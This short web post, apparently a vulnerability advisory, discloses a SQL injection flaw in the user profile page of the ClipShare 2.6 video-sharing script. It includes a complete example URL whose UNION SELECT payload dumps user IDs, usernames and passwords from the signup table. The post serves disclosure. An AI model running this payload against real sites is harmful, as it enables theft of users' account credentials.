ClipShare 2.6 uprofile.php SQL Injection Vulnerability
This is the security issue primarily reported by Krit. and Pr0metheuS. ClipShare leading PHP video sharing script has an SQL injection exploit in user profile page(uprofile.php). ClipShare application does not properly sanitize user supplied UID data before using in an SQL query. Hackers can use this exploit to access or alter user database.
Exmple URI:
http://www.example.com/uprofile.php?UID=1+and+1=2+union+select+1,2,concat(uid,char(58),username,char(58),pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2
0,21,22,23,24,25,26,27,28,29,30,31,32+from+signup+limit+0,20/*
ClipShare not issued any patch to fix this issue. If you have any idea to fix this issue or have patch please share it here so others can benifited from your contribution.
Recent Comments